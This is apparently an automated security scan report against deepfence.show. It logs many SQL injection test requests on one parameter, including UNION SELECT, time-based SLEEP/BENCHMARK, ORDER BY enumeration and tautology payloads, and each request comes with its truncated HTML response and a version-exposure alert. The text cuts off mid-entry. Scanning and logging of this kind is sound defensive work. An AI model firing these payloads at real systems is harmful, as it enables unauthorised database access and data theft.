ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1440\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1441\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1442\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1443\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1444\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1445\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AnD SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1446\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1447\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1448\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1449\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1450Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''^'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1451\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT USER(),SLEEP(5)-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1452\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1453\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# ORDER BY 20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 